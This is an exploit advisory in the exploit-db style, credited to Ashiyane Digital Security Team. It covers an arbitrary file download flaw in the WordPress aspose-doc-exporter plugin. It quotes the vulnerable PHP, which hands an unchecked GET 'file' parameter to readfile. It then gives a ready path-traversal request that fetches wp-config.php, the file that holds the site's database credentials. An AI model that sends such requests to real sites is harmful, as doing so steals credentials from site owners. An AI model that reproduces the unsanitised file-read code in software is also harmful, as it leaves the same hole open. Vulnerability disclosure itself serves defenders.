|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
  |-------------------------------------------------------------------------|
  | [+] Exploit Title: Wordpress aspose-doc-exporter Plugin Arbitrary  
File Download Vulnerability |
  | [+] Exploit Author: Ashiyane Digital Security Team |
  | [+] Vendor Homepage :  
https://wordpress.org/plugins/aspose-doc-exporter/developers/
  | [+] Download Link :  
https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip
  | [+] Tested on: Windows,Linux |
  | [+] Discovered By : ACC3SS
  |-------------------------------------------------------------------------|
  | [+] Exploit: |
  | [+] Vulnerable file :  
http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php  
|
  | [+] Vulnerable Code :

<?php

$file = $_GET['file'];

$file_arr = explode('/',$file);

$file_name = $file_arr[count($file_arr) - 1];

header ("Content-type: octet/stream");

header ("Content-disposition: attachment; filename=".$file_name.";");

header("Content-Length: ".filesize($file));

readfile($file);

exit;

?>


  | [+]  
http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File  
Address]
  | [+]
  | [+] Examples :   
http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
  |-------------------------------------------------------------------------|
  |*||*||*||*||*||*||*||*||*||*||*||*||*